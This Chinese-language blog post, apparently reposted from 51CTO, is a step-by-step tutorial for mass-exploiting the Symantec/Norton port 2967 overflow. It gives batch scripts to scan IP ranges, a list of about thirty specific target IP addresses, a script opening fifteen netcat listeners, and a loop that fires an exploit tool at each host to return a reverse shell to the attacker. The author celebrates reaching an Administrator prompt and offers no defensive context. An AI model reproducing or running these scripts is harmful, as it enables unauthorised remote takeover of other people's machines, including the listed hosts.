編寫批處理檔案利用諾頓2967埠溢位獲得控制權

需要準備的軟體工具：

s.exe      symantec.exe      nc.exe

1、首先編寫一個批處理檔案利用s.exe掃描遠端機器的2967埠。

檔名為sao.bat,內容如下：

@echo Title 諾頓2967掃描工具,製作bye 高迪

color A

@set IPSTART= 

@set IPEND= 

@set XIANCHENG=5

@echo 在進行溢位之前，您必須進行掃描.

set /p IPSTART=請輸入起始地址：

set /p IPEND=請輸入結束地址：

set /p XIANCHENG=請輸入s.exe掃描的執行緒數(預設為5個)：

echo 現在正在掃描,如果您要停止該程式請按Ctrl+C.

s.exe tcp %IPSTART% %IPEND% 2967 %XIANCHENG% /save

2、掃描結束後開啟Result.txt將掃描到的ip地址複製在host.txt檔案內儲存，檔案格式如下（每行一個IP即可）：

218.56.22.114

202.152.40.146 

202.152.41.28 

202.152.41.31 

202.152.41.29 

202.152.41.30 

202.152.41.200 

202.152.41.201 

202.152.41.203 

202.152.41.202 

202.152.41.204 

202.152.41.205 

202.152.41.206 

202.152.41.207 

202.152.41.208 

202.152.41.209 

202.152.41.210 

202.152.41.211 

202.152.41.212 

202.152.41.213 

202.152.41.214 

202.152.41.215 

202.152.41.249 

202.152.41.250 

202.152.41.251 

202.152.41.252 

202.152.41.253 

202.152.41.254 

202.152.41.248 


3、編寫nc2008.bat,內容如下：

@echo off

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

@start nc -vv -l -p 1234

4、編寫2967.bat,內容如下：

@set IP= 

color B

echo 探測本機IP地址並賦值給IP

for /f “tokens=15” %%i in (`ipconfig ^| find /i “ip address”`) do set ip=%%i

@for /f %%i in (host.txt) do symantec -r %%i -l %IP% -d 1234

5、 好了，執行nc2008.bat,再執行2967.bat,觀察剛才開啟的15個CMD視窗，如果有哪個視窗返回C:Documents and SettingsAdministrator> 就OK了，輸入ipconfig 看看該機器IP地址是什麼，用ver檢視一下系統版本，後面的步驟我就不說了。嘿嘿。。。搞定。。。。。。。。。

不過現在絕大多數機器已經把這個漏洞都補上了，掃描可能要費很大功夫。

#網路安全  

本文轉自gaodi2002 51CTO部落格，原文連結:http://blog.51cto.com/gaodi2002/1618193